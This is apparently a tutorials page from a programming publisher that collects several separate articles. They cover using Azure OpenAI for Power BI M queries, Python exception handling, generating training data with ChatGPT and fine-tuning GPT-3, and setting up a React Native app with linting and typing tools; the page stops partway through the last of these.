
How-To Tutorials


Revolutionize Power BI Queries with OpenAI

Gus Frazer
11 Dec 2024
10 min read
This article is an excerpt from the book Data Cleaning with Power BI, by Gus Frazer. Unlock the full potential of your data by mastering the art of cleaning, preparing, and transforming data with Power BI for smarter insights and data visualizations.

Introduction

Discover the transformative potential of leveraging Azure OpenAI, integrated with ChatGPT functionality, to enhance Power BI's M query capabilities. In this article, we delve into how this powerful combination offers expert guidance, efficient solutions, and insightful recommendations for optimizing data transformation tasks. From generating M queries to streamlining complex transformations, explore how Azure OpenAI with ChatGPT empowers users to boost productivity and efficiency in Power BI.

Using OpenAI for M queries

Azure OpenAI, with ChatGPT functionality within it, can be a helpful tool for generating M queries in Power BI by providing suggestions, helping with syntax, and offering insights into data transformation tasks. In the following example, you will learn how you can leverage the chat playground within OpenAI to improve your productivity and efficiency when writing M queries. We will do this by asking a series of questions directly within Azure OpenAI.

Complete the next steps to follow along with the example in your own environment:

1. Click on Deployment on the left-hand side and then select Create new deployment to get started.

2. Select a model from the base models, in this case, gpt-35-turbo, and then name your deployment. In this example, name it CleaningDataOpenAI.

3. Select Chat playground from the Azure OpenAI Studio home screen or from the Playground tab on the left of your screen.

Figure 15.4 – Screenshot of the chat playground from within Azure OpenAI

Now that you have set up an instance of OpenAI, here's an example conversation taken from OpenAI, where the chat functionality has been used to assist with writing M queries in Power BI:

User: Hi, I'm working on a Power BI project, and I need to transform some data using M queries. I have a table with sales data, and I want to calculate the total sales for each product category. Can you help me with the M query for that?

ChatGPT: Of course! To calculate the total sales for each product category, you can use the Group By transformation in Power BI's Power Query Editor. Here's a sample M snippet for your scenario:

let
    Source = YourDataSource,
    GroupedTable = Table.Group(Source, {"ProductCategory"}, {{"TotalSales", each List.Sum([Sales]), type number}})
in
    GroupedTable

Replace YourDataSource with the actual name of your data source. This code groups the data by the ProductCategory column and calculates the total sales for each group.

User: Thanks! That's a great starting point. What if I want to filter out products with sales less than $1,000 before calculating the total sales?

ChatGPT: You can add a filtering step before the Group By transformation. Here's an updated version of the M:

let
    Source = YourDataSource,
    FilteredTable = Table.SelectRows(Source, each [Sales] >= 1000),
    GroupedTable = Table.Group(FilteredTable, {"ProductCategory"}, {{"TotalSales", each List.Sum([Sales]), type number}})
in
    GroupedTable

This code filters out rows where sales are less than $1,000 before grouping the data by product category and calculating the total sales.
User: Perfect! This is really helpful. One more thing – what if I want to sort the results in descending order based on total sales?

ChatGPT: You can add a sorting step using the Table.Sort function. Here's the modified M:

let
    Source = YourDataSource,
    FilteredTable = Table.SelectRows(Source, each [Sales] >= 1000),
    GroupedTable = Table.Group(FilteredTable, {"ProductCategory"}, {{"TotalSales", each List.Sum([Sales]), type number}}),
    SortedTable = Table.Sort(GroupedTable, {{"TotalSales", Order.Descending}})
in
    SortedTable

This code sorts the grouped table in descending order based on the "TotalSales" column.

This interaction represents a simple example of how those who can leverage the power of tools such as OpenAI and ChatGPT will be able to quickly upskill in areas such as coding. It has to be said, though, that while this is still in its infancy, it's important to always test and validate the answers provided before implementing them in production. Also, ensure that you take precautions when using the publicly available ChatGPT model to avoid sharing sensitive data publicly. If you would like to use sensitive data, or you want to ensure that requests are handled within a secured, governed environment, make sure to use the ChatGPT model within your own Azure OpenAI instance.

In more complex examples, optimizing Power Query transformations could involve efficient interaction with Azure OpenAI. This includes streamlining API calls, managing large datasets, and incorporating caching mechanisms for repetitive queries, ensuring a seamless and performant data cleaning process.

As we begin to explore the use cases where this technology can be most effective, there are a number of clear early winners:

Optimizing query plans: ChatGPT's natural language understanding can assist in formulating more efficient Power Query plans. By describing the desired transformations in natural language, users can interact with ChatGPT to generate optimized query plans. This involves selecting the most suitable Power Query functions and structuring transformations for performance gains.

Caching strategies for repetitive queries: ChatGPT can guide users in devising effective caching strategies. By understanding the context of data transformations, it can recommend where to implement caching mechanisms to store and reuse intermediate results, minimizing redundant API calls and computations. The following is an example of just this, where I have asked Azure OpenAI to verify and optimize my query from the Power Query Advanced Editor. The model suggested I use the Table.Buffer function to help cache the table in memory and optimize the query.

Figure – An example request to OpenAI to help optimize my query for Power Query

Figure – An example response from OpenAI to help optimize my query for Power Query

Now, as we highlighted in Chapter 11, M Query Optimization, Table.Buffer can indeed improve the performance of your queries and refreshes, but this really depends on the data you are working with. In the previous example, the model doesn't take the characteristics, size, or complexity of your data into consideration, as it isn't plugged into your data at this stage. Also, linking back to the example you walked through in Chapter 11, the placement of where you add Table.Buffer can really impact how your query performs. In the previous example, if you were connecting to a small dataset, you would likely cause it to run slower by adding the Table.Buffer function as the second variable in the query.

Lastly, it's worth mentioning that how you prompt these models is crucially important. In the previous example, we didn't specify what type of data source we were using in our query. As such, the model hasn't provided an insight or overview that using Table.Buffer on a data source supporting query folding will break the fold. Again, this is not so much of a problem if Table.Buffer is placed at the end of your query for smaller datasets, but it is a problem if you add it nearer to the beginning of the query, as in the previous example.
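As an aside, you don't have to stay in the chat playground for this kind of review: the same request can be scripted. The following is a minimal sketch, assuming the openai Python package (version 1.x) and the CleaningDataOpenAI deployment created earlier; the endpoint, API key, and prompt text are placeholders to adapt to your own environment:

import os
from openai import AzureOpenAI

# Placeholders: point these at your own Azure OpenAI resource.
client = AzureOpenAI(
    azure_endpoint="https://<your-resource>.openai.azure.com",
    api_key=os.environ["AZURE_OPENAI_API_KEY"],
    api_version="2024-02-01",
)

m_query = """
let
    Source = YourDataSource,
    GroupedTable = Table.Group(Source, {"ProductCategory"},
        {{"TotalSales", each List.Sum([Sales]), type number}})
in
    GroupedTable
"""

# Ask the deployment to review and optimize the M query, as in the
# playground conversation above.
response = client.chat.completions.create(
    model="CleaningDataOpenAI",  # the deployment name, not the base model name
    messages=[
        {"role": "system", "content": "You review and optimize Power Query M code."},
        {"role": "user", "content": "Verify and optimize this M query:\n" + m_query},
    ],
)
print(response.choices[0].message.content)

Note that scripting the request makes it easy to include the context the playground conversation lacked, such as the data source type and approximate table size, directly in the prompt.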
Handling large datasets: Dealing with large datasets often poses a challenge in Power Query. OpenAI models, including ChatGPT, can provide insights into dividing and conquering large datasets. This includes strategies for parallel processing, filtering data early in the transformation pipeline, and using aggregations to reduce computational load.

Dynamic query adjustments: ChatGPT's interactive nature allows users to dynamically adjust queries based on evolving requirements. It can assist in crafting queries that adapt to changing data scenarios, ensuring that Power Query transformations remain flexible and responsive to varied datasets.

Guidance on complex transformations: Power Query often involves intricate transformations. ChatGPT can act as a virtual assistant, guiding users through the process of complex transformations. It can suggest optimal function compositions, advise on conditional logic placement, and assist in structuring transformations to enhance efficiency. The best example of this can be seen in the following two screenshots of an active use case seen in many businesses. The example begins with a user asking the model for a description of what the query is doing. OpenAI then provides a breakdown of what the query is doing in each step to help the user interpret the code. It helps to break down the barriers to coding and also helps to decipher code that has not been documented well by previous employees.

Figure – An example request to OpenAI to help translate my query

Figure – An example response from OpenAI to help describe my query

Error handling strategies: Optimizing Power Query also entails robust error handling. ChatGPT can provide recommendations for anticipating and handling errors gracefully within a query. This includes strategies for logging errors, implementing fallback mechanisms, and ensuring the stability of the overall data preparation process.

In this section, you learned how to optimize Power Query transformations with Azure OpenAI efficiently. Key takeaways include using ChatGPT for natural-language-based query planning and effective caching strategies. Insights include handling large datasets through parallel processing, early filtering, and aggregations. This knowledge equips you to streamline and enhance your Power Query processes effectively.

In the next section, you will learn about Microsoft Copilot, how to set up a Power BI instance with Copilot activated, and also how you can use this new AI technology to help clean and prepare your data.

Conclusion

In conclusion, Azure OpenAI with ChatGPT presents a game-changing solution for maximizing Power BI's potential. From query optimization to error-handling strategies, this integration streamlines processes and enhances productivity.
As users navigate complex data transformations, the guidance provided fosters efficient decision-making and empowers users to tackle challenges with confidence. With Azure OpenAI and ChatGPT, the possibilities for revolutionizing Power BI workflows are endless, offering a glimpse into the future of data transformation and analytics.

Author Bio

Gus Frazer is a seasoned analytics consultant focused on business intelligence solutions. With over 7 years of experience working for the two market-leading platforms, Power BI and Tableau, he has amassed a wealth of knowledge and expertise. Gus has helped hundreds of customers to drive their digital and data transformations, scope data requirements, drive actionable insights, and, most important of all, cleanse data ready for analysis. Most recently, he helped to set up, organize, and run the Power BI UK community at Microsoft. He holds six Azure and Power BI certifications, including PL-300 and DP-500. In this book, Gus offers readers invaluable guidance on ingesting, preparing, and cleansing data for analysis in Power BI.

How to perform exception handling in Python with ‘try, catch and finally’

Guest Contributor
10 Dec 2019
9 min read
An integral part of using Python involves the art of handling exceptions. There are primarily two types of exceptions: built-in exceptions and user-defined exceptions. When an error occurs, the error-handling resolution is to save the state of execution at the moment of the error, interrupting the normal program flow to execute a special function or block of code called an exception handler. There are many types of errors, such as 'division by zero' and 'file open error', where an error handler needs to fix the issue so that the program can continue based on prior saved data.

Exception handling in Python is much like it is in Java. Code that may raise exceptions is embedded in a try block. Where Java uses catch clauses to catch exceptions, Python uses clauses that begin with except. Custom exceptions are also possible in Python by using the raise statement, which forces a specified exception to occur.

Reason to use exceptions

Errors are always expected while writing a program in Python, which requires a backup mechanism. Such a mechanism is set to handle any encountered errors; not having one may crash the program completely. The reason to equip a Python program with an exception mechanism is to define a backup plan in case any possible error situation erupts while executing the program.

Catch exceptions in Python

The try statement is used for handling exceptions in Python. A try clause will contain a raised exception associated with a particular, critical operation. The code for handling the exception is written within the except clause. The choice of what operation to perform once the exception is caught is up to the programmer.

Consider a program that loops until the user enters an integer value with a valid reciprocal. The part of the code that can trigger an exception is contained inside the try block. If no exception is raised, the normal flow of execution continues and the except block is skipped; if an exception is raised, it is caught by the except block. Naming the exception is possible using the exc_info() function in the sys module. Any unexpected value like 'a' or '1.3' triggers a ValueError, and entering '0' leads to a ZeroDivisionError; in each case, the program asks the user to make another attempt.

Exception handling in Python: try, except and finally

Suspicious code that may raise an exception is placed inside the try statement block, and the code dedicated to handling such raised exceptions is placed within the except block:

try:
    # operational/suspicious code
except SomeException:
    # code to handle the exception

How do they work in Python: the try block statements are executed first to check whether or not any exception occurs within the code. If no exception occurs, the except block is skipped and execution continues after the try statement. When a raised exception matches the name given in the except clause (SomeException above), that except block handles it and enables the program to continue.
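The code and output for the reciprocal loop described above appeared as screenshots in the original article; a minimal runnable sketch of it, assuming nothing beyond the standard library, looks like this:

import sys

# Loop until the user enters an integer with a valid reciprocal.
while True:
    try:
        value = int(input("Enter an integer: "))
        reciprocal = 1 / value
        print("The reciprocal of", value, "is", reciprocal)
        break
    except:
        # sys.exc_info() names the exception that was just raised,
        # e.g. ValueError for 'a' or '1.3', ZeroDivisionError for 0.
        print("Oops!", sys.exc_info()[0], "occurred. Please try again.")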
If there is no handler in the except clauses corresponding to the raised exception, program execution is halted along with an error message describing it.

Defining except without the exception

Defining the except clause with a named exception isn't always required. An except statement without an exceptions field handles all possible types of exceptions, although it will keep users ignorant about which exception, if any, was raised in the first place. Some example statements are defined below:

try:
    # You do your operations here
except:
    # If there is an exception, then execute this block
else:
    # If there is no exception, then execute this block

Here is an example of catching an exception around file access, useful when the intention is to read a file that may not exist:

try:
    fp = open('example.txt', 'r')
except:
    print('File is not found')
else:
    fp.close()

This example deals with opening 'example.txt'. When the file is not found or does not exist, the code executes the except block, printing the error message 'File is not found'.

Defining except clause for multiple exceptions

It is possible to deal with multiple exceptions in a single try statement by specifying different exception handlers. It is also recommended, as good programming practice, to name the particular exceptions you expect within the code. One way to do this is to define a tuple that handles several predefined exceptions within the same except clause; if the interpreter gets hold of a matching exception, the code written under that except clause is executed. The below example shows the way to define such exceptions:

try:
    # do something
except (Exception1, Exception2, ..., ExceptionN):
    # handle any of the listed exceptions
    pass
except:
    # handle all other exceptions

An else clause can again be added to run when no exception is raised:

try:
    # You do your operations here
except (Exception1, Exception2, ..., ExceptionN):
    # If there is an exception from the given exception list, execute this block
else:
    # If there is no exception, then execute this block

Exception handling in Python using the try-finally clause

Apart from combining try and except blocks, it is also a good idea to put together try and finally blocks. Here, the finally block carries all the necessary statements that must be executed regardless of whether an exception is raised in the try block. One benefit of using this method is that it helps in releasing external resources and clearing up caches. Here is the pseudo-code for a try...finally clause:

try:
    # perform operations
finally:
    # these statements are always executed
Defining exceptions in try...finally block

The example given below closes the file once all the operations are completed:

try:
    fp = open("example.txt", 'r')
    # file operations
finally:
    fp.close()

When using the try statement in Python, it comes with this optional finally clause, whose code is executed under any circumstances and is usually used to release additional external resources. It is not new for developers to be connected to a remote data center over a network, or to work with a file or a graphical user interface. Such situations push developers to clean up the used resources, and even when the resources yield successful results, such post-execution steps are always considered good practice. Actions like shutting down the GUI, closing a file, or disconnecting from a connected network, written in the finally block, are assured of execution. The file operations example below illustrates this very well:

try:
    f = open("test.txt", encoding='utf-8')
    # perform file operations
finally:
    f.close()

Or, in simpler terms:

try:
    # You do your operations here;
    # due to any exception, the rest may be skipped
finally:
    # this would always be executed

Constructing such a block is a better way to ensure the file is closed even if an exception has taken place. Make a note that it is not possible to use an else clause along with the above-defined finally clause, since else requires at least one except clause.

Understanding user-defined exceptions

Python users can create their own exceptions by deriving classes from the built-in standard exceptions. There are instances where displaying specific information to users is crucial, especially upon catching the exception. In such cases, it is best to create a class that is subclassed from RuntimeError. Here, the try block will raise a user-defined exception that is caught in the except block, with variable e holding an instance of the Networkerror class:

class Networkerror(RuntimeError):
    def __init__(self, arg):
        self.args = (arg,)

Once the class is defined, raising the exception is possible as follows:

try:
    raise Networkerror("Bad hostname")
except Networkerror as e:
    print(e.args)

Key points to remember

An exception is an error that occurs while executing the program, indicating events that occur less frequently. As mentioned in the examples above, the most common exceptions are 'division by zero', 'attempting to access a non-existent file', and 'adding two incompatible types'. Put a try statement around code where you are not sure whether or not an exception will occur. Specify an else block alongside the try-except statement, which will trigger when no exception is raised in the try block.

Author bio

Shahid Mansuri co-founded Peerbits, one of the leading software development companies in the USA, in 2011, which provides Python development services. Under his leadership, Peerbits used Python on a project to embed reports and research on a platform that let every user access both the freely available dashboard and the exclusively available one.
His visionary leadership and flamboyant management style have yielded fruitful results for the company. He believes in sharing his strong knowledge base, with a learned concentration on entrepreneurship and business.

Introducing Spleeter, a TensorFlow-based Python library that extracts voice and sound from any music track

Fake Python libraries removed from PyPI when caught stealing SSH and GPG keys, reports ZDNet

There's more to learning programming than just writing code

Leveraging ChatGPT and GPT-3

Deborah A. Dahl
12 Feb 2024
8 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights.

This article is an excerpt from the book Natural Language Understanding with Python, by Deborah A. Dahl. Combine natural language technology, deep learning, and large language models to create human-like language comprehension in computer systems.

Introduction

In the world of artificial intelligence, ChatGPT stands as a versatile conversational agent, adept at handling generic information interactions. While customization can be a challenge at present, ChatGPT offers a unique avenue for developers and AI enthusiasts alike. Beyond chat-based dialogue, it holds the potential to streamline the often time-consuming process of generating training data for conventional applications. In this article, we delve into the capabilities of ChatGPT and explore the journey of fine-tuning GPT-3 for specific use cases. By the end, you'll be equipped to harness the power of these language models, from data generation to AI customization, in your projects. Let's embark on this exciting AI journey together.

ChatGPT

ChatGPT (https://openai.com/blog/chatgpt/) is a system that can interact with users about generic information in a very capable way. Although at the time of writing it is hard to customize ChatGPT for specific applications, it can be useful for purposes other than customized natural language applications. For example, it can very easily be used to generate training data for a conventional application. If we wanted to develop a banking application using some of the techniques discussed earlier in this book, we would need training data to provide the system with examples of how users might ask the system questions. Typically, this involves a process of collecting actual user input, which could be very time-consuming. ChatGPT could be used to generate training data instead, simply by asking it for examples. For example, for the prompt "give me 10 examples of how someone might ask for their checking balance", ChatGPT responded with the sentences in Figure 11.3:

Figure 11.3 – GPT-3 generated training data for a banking application

Most of these seem like pretty reasonable queries about a checking account, but some of them don't seem very natural. For that reason, data generated in this way always needs to be reviewed. For example, a developer might decide not to include the second-to-last example in a training set because it sounds stilted, but overall, this technique has the potential to save developers quite a bit of time.

Applying GPT-3

Another well-known LLM, GPT-3, can also be fine-tuned with application-specific data, which should result in better performance. To do this, you need an OpenAI key because using GPT-3 is a paid service. Both fine-tuning to prepare the model and using the fine-tuned model to process new data at inference time will incur a cost, so it is important to verify that the training process is performing as expected before training with a large dataset and incurring the associated expense.

OpenAI recommends the following steps to fine-tune a GPT-3 model:

1. Sign up for an account at https://openai.com/ and obtain an API key. The API key will be used to track your usage and charge your account accordingly.

2. Install the OpenAI command-line interface (CLI) with the following command:
pip install --upgrade openai

This command can be used at a terminal prompt in Unix-like systems (some developers have reported problems with Windows or macOS). Alternatively, you can install GPT-3 to be used in a Jupyter notebook with the following code:

!pip install --upgrade openai

All of the following examples assume that the code is running in a Jupyter notebook.

3. Set your API key:

api_key = <your API key>
openai.api_key = api_key

4. The next step is to specify the training data that you will use for fine-tuning GPT-3 for your application. This is very similar to the process of training any NLP system; however, GPT-3 has a specific format that must be used for training data. This format uses a syntax called JSONL, where every line is an independent JSON expression. For example, if we want to fine-tune GPT-3 to classify movie reviews, a couple of data items would look like the following (omitting some of the text for clarity):

{"prompt":"this film is extraordinarily horrendous and i'm not going to waste any more words on it . ","completion":" negative"}
{"prompt":"9 : its pathetic attempt at \" improving \" on a shakespeare classic . 8 : its just another piece of teen fluff . 7 : kids in high school are not that witty . … ","completion":" negative"}
{"prompt":"claire danes , giovanni ribisi , and omar epps make a likable trio of protagonists , …","completion":" negative"}

Each item consists of a JSON dict with two keys, prompt and completion. prompt is the text to be classified, and completion is the correct classification. All three of these items are negative reviews, so the completions are all marked as negative.

It might not always be convenient to get your data into this format if it is already in another format, but OpenAI provides a useful tool for converting other formats into JSONL. It accepts a wide range of input formats, such as CSV, TSV, XLSX, and JSON, with the only requirement for the input being that it contains two columns with prompt and completion headers. Table 11.2 shows a few cells from an Excel spreadsheet with some movie reviews as an example:

prompt | completion
kolya is one of the richest films i've seen in some time . zdenek sverak plays a confirmed old bachelor ( who's likely to remain so ) , who finds his life as a czech cellist increasingly impacted by the five-year old boy that he's taking care of … | positive
this three hour movie opens up with a view of singer/guitar player/musician/composer frank zappa rehearsing with his fellow band members . all the rest displays a compilation of footage , mostly from the concert at the palladium in new york city , halloween 1979 … | positive
`strange days' chronicles the last two days of 1999 in los angeles . as the locals gear up for the new millenium , lenny nero ( ralph fiennes ) goes about his business … | positive

Table 11.2 – Movie review data for fine-tuning GPT-3

To convert one of these alternative formats into JSONL, you can use the fine_tunes.prepare_data tool, as shown here, assuming that your data is contained in the movies.csv file:

!openai tools fine_tunes.prepare_data -f ./movies.csv -q

The fine_tunes.prepare_data utility will create a JSONL file of the data and will also provide some diagnostic information that can help improve the data. The most important diagnostic that it provides is whether or not the amount of data is sufficient; OpenAI recommends several hundred examples for good performance. Other diagnostics include various types of formatting information, such as the separators between the prompts and the completions.
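If you prefer to see what the conversion involves, a minimal sketch using only Python's standard library produces the same JSONL shape from a CSV with prompt and completion headers. The movies.csv filename follows the example above, and the leading space on each completion mirrors the format shown earlier:

import csv
import json

# Convert a two-column CSV (prompt, completion) into JSONL,
# one JSON object per line, as expected for fine-tuning.
with open("movies.csv", newline="", encoding="utf-8") as src, \
     open("movies_prepared.jsonl", "w", encoding="utf-8") as dst:
    for row in csv.DictReader(src):
        record = {
            "prompt": row["prompt"],
            "completion": " " + row["completion"].strip(),
        }
        dst.write(json.dumps(record) + "\n")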
After the data is correctly formatted, you can upload it to your OpenAI account and save the file ID:

file_name = "./movies_prepared.jsonl"
upload_response = openai.File.create(
    file=open(file_name, "rb"),
    purpose='fine-tune'
)
file_id = upload_response.id

The next step is to create and save a fine-tuned model. There are several different OpenAI models that can be used. The one we're using here, ada, is the fastest and least expensive, and does a good job on many classification tasks:

fine_tune_response = openai.FineTune.create(training_file=file_id, model="ada")
fine_tuned_model = fine_tune_response.fine_tuned_model

Finally, we can test the model with a new prompt:

answer = openai.Completion.create(
    model = fine_tuned_model,
    engine = "ada",
    prompt = " I don't like this movie ",
    max_tokens = 10,  # change the number of tokens for a longer completion
    temperature = 0
)
answer['choices'][0]['text']

In this example, since we are only using a few fine-tuning utterances, the results will not be very good. You are encouraged to experiment with larger amounts of training data.

Conclusion

In conclusion, ChatGPT and GPT-3 offer invaluable tools for AI enthusiasts and developers alike. From data generation to fine-tuning for specific applications, these models present a world of possibilities. As we've seen, ChatGPT can expedite the process of creating training data, while GPT-3's customization can elevate the performance of your AI applications. As the field of artificial intelligence continues to evolve, these models hold immense promise. So, whether you're looking to streamline your development process or take your AI solutions to the next level, the journey with ChatGPT and GPT-3 is an exciting one filled with untapped potential. Embrace the future of AI with confidence and innovation.

Author Bio

Deborah A. Dahl is the principal at Conversational Technologies, with over 30 years of experience in natural language understanding technology. She has developed numerous natural language processing systems for research, commercial, and government applications, including a system for NASA, and speech and natural language components on Android. She has taught over 20 workshops on natural language processing, consulted on many natural language processing applications for her customers, and written over 75 technical papers. This is Deborah's fourth book on natural language understanding topics. Deborah has a PhD in linguistics from the University of Minnesota and postdoctoral studies in cognitive science from the University of Pennsylvania.

How to create a native mobile app with React Native [Tutorial]

Bhagyashree R
19 Feb 2019
12 min read
React Native was developed by Facebook, along the lines of the React framework. Instead of rendering components to a browser's DOM, React Native (RN) invokes native APIs to create internal components that are handled through your JS code. There are some differences between the usual HTML elements and RN's components, but they are not too hard to overcome. With this tool, you are actually building a native app that looks and behaves exactly like any other native application, except that you use a single language, JS, for both Android and iOS development.

This article is taken from the book Modern JavaScript Web Development Cookbook by Federico Kereki. This book is a perfect blend of solutions for traditional JavaScript development and modern areas that developers have recently been exploring with JavaScript. This problem-solving guide teaches you popular problem-solving techniques for JavaScript on servers, browsers, mobile phones, and desktops. To follow along with the examples implemented in this article, you can download the code from the book's GitHub repository.

In this article, we'll see how to install and use React Native to build a mobile application. We will also see how to add development tools like ESLint, Flow, and Prettier.

Setting up a RN application

There are three ways to set up a RN application: manually, which you won't want to do; with packages, using the react-native-cli command-line interface; or by using a package very similar to create-react-app, called create-react-native-app (or CRAN). We start by getting a command-line utility, which will include plenty of other packages:

npm install create-react-native-app -g

Afterward, we can create and run a simple project with just three commands:

create-react-native-app yourprojectname
cd yourprojectname
npm start

How it works...

When you run your app, it starts a server on your machine, at port 19000 or 19001, to which you will connect using the Expo application. You can download Expo from its official website; it is available for both Android and iOS. Install it by following the instructions onscreen.

Note that both the phone and your machine must be on the same local network, and your machine must also allow connections to ports 19000 and 19001; you may have to modify your firewall for this to work. After you use the Scan QR Code option, there will be some synchronization, and soon you'll get to see your basic code running with no problems. Furthermore, if you modify the App.js source code, the changes will be immediately reflected in your device, which means all is well! To make sure this happens, shake the phone to enable the debugging menu, and make sure that Live Reload and Hot Reloading are enabled. You'll also require Remote JS Debugging for later.

Adding development tools

Next, we need to add all the development tools required. We want to have ESLint for code checking, Prettier for formatting, and Flow for data types. CRAN takes care of including Babel and Jest, so we won't have to do anything for those two.

How to do it...

As opposed to React, where we need to add a special rewiring package in order to work with specific configurations, in RN we can just add some packages and configuration files, and we'll be ready to go.
Adding ESLint

For ESLint, we'll have quite a list of packages we want:

npm install --save-dev \
    eslint eslint-config-recommended eslint-plugin-babel \
    eslint-plugin-flowtype eslint-plugin-react eslint-plugin-react-native

We'll require a separate .eslintrc file, as in the case with React. The appropriate contents include the following:

{
    "parser": "babel-eslint",
    "parserOptions": {
        "ecmaVersion": 2017,
        "sourceType": "module",
        "ecmaFeatures": { "jsx": true }
    },
    "env": {
        "node": true,
        "browser": true,
        "es6": true,
        "jest": true,
        "react-native/react-native": true
    },
    "extends": [
        "eslint:recommended",
        "plugin:flowtype/recommended",
        "plugin:react/recommended",
        "plugin:react-native/all"
    ],
    "plugins": ["babel", "flowtype", "react", "react-native"],
    "rules": {
        "no-console": "off",
        "no-var": "error",
        "prefer-const": "error",
        "flowtype/no-types-missing-file-annotation": 0
    }
}

Adding Flow

Having completed that, ESLint is set to recognize our code, but we have to configure Flow as well:

npm install --save-dev flow flow-bin flow-coverage-report flow-typed

We'll have to add a couple of lines to the scripts section of package.json:

"scripts": {
    "start": "react-native-scripts start",
    . . .
    "flow": "flow",
    "addTypes": "flow-typed install"
},

Then, we have to initialize the working directories of Flow:

npm run flow init

The contents of the .flowconfig file look like this:

[ignore]
.*/node_modules/.*

[include]

[libs]

[lints]
all=warn
untyped-type-import=off
unsafe-getters-setters=off

[options]
include_warnings=true

[strict]

Adding Prettier

There's not much to installing Prettier; all we need is an npm command, plus the .prettierrc file. For the former, just use the following command:

npm install --save-dev prettier

For configuration, we can use the contents of this .prettierrc file:

{
    "tabWidth": 4,
    "printWidth": 75
}

How it works...

Let's check that everything is OK. We'll start by looking at the App.js file that was created by CRAN, and we can immediately verify that the tools work—because a problem is detected! The rule that fails is a new one, from eslint-plugin-react-native: no-color-literals, because we are using constants in styling, which could prove to be a maintenance headache in the future. We can solve that by adding a variable, and we'll use a type declaration to make sure Flow is also running. The new code should be as follows:

// Source file: App.original.fixed.js
/* @flow */

import React from "react";
import { StyleSheet, Text, View } from "react-native";

export default class App extends React.Component<> {
    render() {
        return (
            <View style={styles.container}>
                <Text>Open up App.js to start working on your app!</Text>
                <Text>Changes you make will automatically reload.</Text>
                <Text>Shake your phone to open the developer menu.</Text>
            </View>
        );
    }
}

const white: string = "#fff";

const styles = StyleSheet.create({
    container: {
        flex: 1,
        backgroundColor: white,
        alignItems: "center",
        justifyContent: "center"
    }
});

Using native components

Working with RN is very much like working with React—there are components, state, props, life cycle events, and so on—but there is a key difference: your own components won't be based on HTML but on specific RN ones. For instance, you won't be using <div> elements, but rather <View> ones, which will then be mapped by RN to a UIView for iOS, or to an Android.View for Android.

Getting ready

We will start with an example of a countries and regions page, which you can find in the book's GitHub repository.
Since we are using PropTypes, we'll need that package. Install it with the following command:

npm install prop-types --save

Then, we'll have to install some packages, starting with Redux and relatives. Actually, CRAN already includes redux and react-redux, so we don't need those, but redux-thunk isn't included. We can install it using the following command:

npm install react react-redux redux-thunk --save

We'll also be using axios for async calls:

npm install axios --save

Our final step will be to run the server code (you can find it in the GitHub repo) so that our app will be able to do async calls. After downloading the server code from the GitHub repo, go to the directory and just enter the following command:

node out/restful_server.js

Let's now see how we can modify our code to make it appropriate for RN.

How to do it...

Since RN uses its own components, your HTML experience will be of little use. Here, we'll see some changes, but in order to derive the full benefits of all of RN's possibilities, you'll have to study its components on your own. Let's start with the <RegionsTable> component, which is rather simple:

// Source file: src/regionsApp/regionsTable.component.js
. . .
render() {
    if (this.props.list.length === 0) {
        return (
            <View>
                <Text>No regions.</Text>
            </View>
        );
    } else {
        const ordered = [...this.props.list].sort(
            (a, b) => (a.regionName < b.regionName ? -1 : 1)
        );
        return (
            <View>
                {ordered.map(x => (
                    <View key={x.countryCode + "-" + x.regionCode}>
                        <Text>{x.regionName}</Text>
                    </View>
                ))}
            </View>
        );
    }
}

Notice that there are no changes in the rest of the component, and all your React knowledge is still valid; you just have to adjust the output of your rendering method. Next, we'll change the <CountrySelect> component to use <Picker>, which is sort of similar, but we'll require some extra modifications. Let's take a look at our component, highlighting the parts where changes are needed:

// Source file: src/regionsApp/countrySelect.component.js
/* @flow */

import React from "react";
import PropTypes from "prop-types";
import { View, Text, Picker } from "react-native";

export class CountrySelect extends React.PureComponent<{
    dispatch: ({}) => any
}> {
    static propTypes = {
        loading: PropTypes.bool.isRequired,
        currentCountry: PropTypes.string.isRequired,
        list: PropTypes.arrayOf(PropTypes.object).isRequired,
        onSelect: PropTypes.func.isRequired,
        getCountries: PropTypes.func.isRequired
    };

    componentDidMount() {
        if (this.props.list.length === 0) {
            this.props.getCountries();
        }
    }

    onSelect = value => this.props.onSelect(value);

    render() {
        if (this.props.loading) {
            return (
                <View>
                    <Text>Loading countries...</Text>
                </View>
            );
        } else {
            const sortedCountries = [...this.props.list].sort(
                (a, b) => (a.countryName < b.countryName ? -1 : 1)
            );
            return (
                <View>
                    <Text>Country:</Text>
                    <Picker
                        onValueChange={this.onSelect}
                        prompt="Country"
                        selectedValue={this.props.currentCountry}
                    >
                        <Picker.Item
                            key={"00"}
                            label={"Select a country:"}
                            value={""}
                        />
                        {sortedCountries.map(x => (
                            <Picker.Item
                                key={x.countryCode}
                                label={x.countryName}
                                value={x.countryCode}
                            />
                        ))}
                    </Picker>
                </View>
            );
        }
    }
}

Lots of changes! Let's go through them in the order they occur:

An unexpected change: if you want a <Picker> component to display its current value, you must set its selectedValue property; otherwise, even if the user selects a country, the change won't be seen onscreen. We'll have to provide an extra prop, currentCountry, which we'll get from the store, so we can use it as the selectedValue for our list.
The fired event when the user selects a value is also different: the event handler will be called directly with the chosen value, instead of with an event from which to read event.target.value.

We have to replace the <select> element with <Picker>, and provide a prompt text prop that will be used when the expanded list is shown onscreen.

We have to use <Picker.Item> elements for the individual options, noting that the label to be displayed is now a prop.

Let's not forget the change when connecting the list of countries to the store; we'll only have to add an extra property to the getProps() function:

// Source file: src/regionsApp/countrySelect.connected.js
const getProps = state => ({
    list: state.countries,
    currentCountry: state.currentCountry,
    loading: state.loadingCountries
});

Now, all we need to do is see how the main app is set up. Our App.js code will be quite simple:

// Source file: App.js
/* @flow */

import React from "react";
import { Provider } from "react-redux";
import { store } from "./src/regionsApp/store";
import { Main } from "./src/regionsApp/main";

export default class App extends React.PureComponent<> {
    render() {
        return (
            <Provider store={store}>
                <Main />
            </Provider>
        );
    }
}

This is pretty straightforward. The rest of the setup will be in the main.js file, which has some interesting details:

// Source file: src/regionsApp/main.js
/* @flow */

import React from "react";
import { View, StatusBar } from "react-native";
import { ConnectedCountrySelect, ConnectedRegionsTable } from ".";

export class Main extends React.PureComponent<> {
    render() {
        return (
            <View>
                <StatusBar hidden />
                <ConnectedCountrySelect />
                <ConnectedRegionsTable />
            </View>
        );
    }
}

Apart from the usage of <View> wherever we would previously have used <div> (a change to which you should already have gotten used), there's an added detail: we don't want the status bar to show, so we use the <StatusBar> element and make sure to hide it.

How it works...

